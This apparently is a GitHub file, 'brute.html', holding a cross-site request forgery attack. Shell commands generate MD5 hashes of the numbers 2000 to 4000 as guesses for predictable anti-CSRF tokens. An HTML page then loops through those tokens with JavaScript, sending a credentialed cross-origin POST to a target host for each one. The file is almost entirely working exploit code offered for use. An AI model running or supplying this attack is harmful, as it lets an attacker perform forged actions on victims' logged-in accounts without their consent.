-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbrute.html
84 lines (63 loc) · 2.12 KB
/
brute.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#############################
#create list based on vulnerable code
seq 2000 4000 > my_file.txt
----
#!/bin/bash
#read.file.line.by.line.sh
while read line
do
echo $line | md5sum | awk '{print $1}'
done
----
more my_file.txt | ./read.line.by.line.sh | md5sum | cut -d ' ' -f 1
in theory that would generate 2000 md5 hashes of 2000-4000 incrementally (adjust accordingly)
from there its generating a python brute force script that follows a redirect, I wrote it a bit differently
#############################
<html>
<head>
<script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
</head>
<body>
//total tokens obviously adjusted and generated
<h1>Anti-CSRF Tokens to test</h1>
<textarea id="tokens" rows="(total here)" cols="60">
08f90c1a417155361a5c4b8d297e0d78
d0fb963ff976f9c37fc81fe03c21ea7b
</textarea>
<script>
function bruteLoop(TList) {
for (var i = 0; i < TList.length; i++) {
console.info("Testing: " + TList[i]);
XHRPost(TList[i]);
}
}
function XHRPost(tVal) {
var http = new XMLHttpRequest();
var url = "(host)";
var token = tVal;
//fill in accordingly
params = {
"name" : "Bob",
"acdt67gshfuiuasfsg" : token,
};
http.open("POST", url, true);
http.withCredentials = 'true';
//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
if (http.readyState > 1) {//We don't care about responses
//console.warn("Aborted " + token + " with status " + http.readyState);
//http.abort();
}
}
//Serialize the data without using JQuery
queryParams = Object.keys(params).reduce(function(a,k){a.push(k+'='+encodeURIComponent(params[k]));return a},[]).join('&');
http.send(queryParams);
}
var tokens = document.getElementById('tokens').value.replace(/\s+/gm, '\n').split('\n');
tokens = tokens.filter(Boolean); // Remove empty lines
// Brute Loop
bruteLoop(tokens);
</script>
</body>
</html>